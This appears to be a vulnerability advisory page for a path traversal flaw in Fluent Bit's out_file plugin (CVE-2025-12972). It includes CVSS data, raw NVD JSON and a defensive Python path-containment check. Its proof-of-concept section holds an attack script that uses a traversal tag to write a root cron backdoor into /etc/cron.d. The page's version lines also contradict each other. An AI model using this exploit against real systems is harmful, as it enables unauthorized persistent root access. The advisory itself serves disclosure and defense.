Security Vulnerability Report
CVE-2025-12972 CVSS 5.3 MEDIUM

CVE-2025-12972

Published: 2025-11-24 15:15:47
Last Modified: 2025-11-28 18:15:46

Description

Fluent Bit out_file plugin does not properly sanitize tag values when deriving output file names. When the File option is omitted, the plugin uses untrusted tag input to construct file paths. This allows attackers with network access to craft tags containing path traversal sequences that cause Fluent Bit to write files outside the intended output directory.
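
A containment check of the kind this weakness class (CWE-22) calls for, shown as an added defensive example; it is not Fluent Bit's code or its actual fix. The names safe_output_path, UnsafeTagError and audit_tags, and the sample tags and output directory, are hypothetical and constructed for illustration.

```python
import os
import tempfile


class UnsafeTagError(ValueError):
    """The tag would resolve to a path outside the output directory."""


def safe_output_path(base_dir: str, tag: str) -> str:
    """Return the output file path for an untrusted tag, or raise UnsafeTagError.

    Hypothetical helper modelling the case described above: no File option is
    set, so the file name is derived from the record tag.
    """
    if not tag or "\x00" in tag:
        raise UnsafeTagError("empty tag or NUL byte")
    base = os.path.realpath(base_dir)
    # realpath collapses ".." and follows symlinks. Joining an absolute tag
    # discards base entirely, which the containment check below catches.
    candidate = os.path.realpath(os.path.join(base, tag))
    # commonpath compares whole path components, so "<base>-evil" is not
    # mistaken for a location inside "<base>" (a plain prefix test would be).
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        raise UnsafeTagError(f"tag {tag!r} escapes {base}")
    return candidate


def audit_tags(base_dir, tags):
    """Split tags into (accepted tag -> path, rejected tags) for alerting."""
    accepted, rejected = {}, []
    for tag in tags:
        try:
            accepted[tag] = safe_output_path(base_dir, tag)
        except UnsafeTagError:
            rejected.append(tag)
    return accepted, rejected


if __name__ == "__main__":
    out_dir = tempfile.mkdtemp(prefix="flb-out-")  # constructed output directory
    # Constructed sample tags: two ordinary ones and three that must be refused.
    sample = ["app.access", "kube.var.log.nginx", "../../outside/file", "/abs/path", "."]
    ok, bad = audit_tags(out_dir, sample)
    print("accepted:", sorted(ok))
    print("rejected:", bad)
```

The check and the later file open are separate steps, so the output directory itself should not be writable by other local users.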

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:treasuredata:fluent_bit:4.1.0:*:*:*:*:*:*:* - VULNERABLE
Fluent Bit < 4.1 (fixed in v4.1)
Fluent Bit < 4.0.x (backported fix in v4.0)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket
import time

# PoC for CVE-2025-12972 - Fluent Bit out_file Path Traversal
# This PoC demonstrates how to exploit the path traversal vulnerability

def send_malicious_tag(host, port, tag, message):
    """Send a malformed log entry with path traversal in the tag"""
    msgpack_data = pack_msgpack(tag, message)
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((host, port))
    sock.send(msgpack_data)
    sock.close()

def pack_msgpack(tag, message):
    """Pack data in MessagePack format for Fluent Bit"""
    # Simplified MessagePack packing
    import msgpack
    return msgpack.packb({
        'tag': tag,
        'message': message,
        'timestamp': time.time()
    })

# Example: Write to /etc/cron.d using path traversal
malicious_tag = '../../../../etc/cron.d/backdoor'
payload = '*/5 * * * * root /tmp/malicious.sh'
print(f'Exploiting CVE-2025-12972 with tag: {malicious_tag}')
# send_malicious_tag('target-ip', 5140, malicious_tag, payload)

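References

https://fluentbit.io/blog/2025/10/28/security-vulnerabilities-addressed-in-fluent-bit-v4.1-and-backported-to-v4.0/
https://www.oligo.security/blog/critical-vulnerabilities-in-fluent-bit-expose-cloud-environments-to-remote-takeover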

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12972", "sourceIdentifier": "[email protected]", "published": "2025-11-24T15:15:46.627", "lastModified": "2025-11-28T18:15:46.400", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Fluent Bit out_file plugin does not properly sanitize tag values when deriving output file names. When the File option is omitted, the plugin uses untrusted tag input to construct file paths. This allows attackers with network access to craft tags containing path traversal sequences that cause Fluent Bit to write files outside the intended output directory."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:treasuredata:fluent_bit:4.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "4D0EA105-B741-4E44-828A-9300B09A7A79"}]}]}], "references": [{"url": "https://fluentbit.io/blog/2025/10/28/security-vulnerabilities-addressed-in-fluent-bit-v4.1-and-backported-to-v4.0/", "source": "[email protected]"}, {"url": "https://www.oligo.security/blog/critical-vulnerabilities-in-fluent-bit-expose-cloud-environments-to-remote-takeover", "source": "[email protected]"}]}}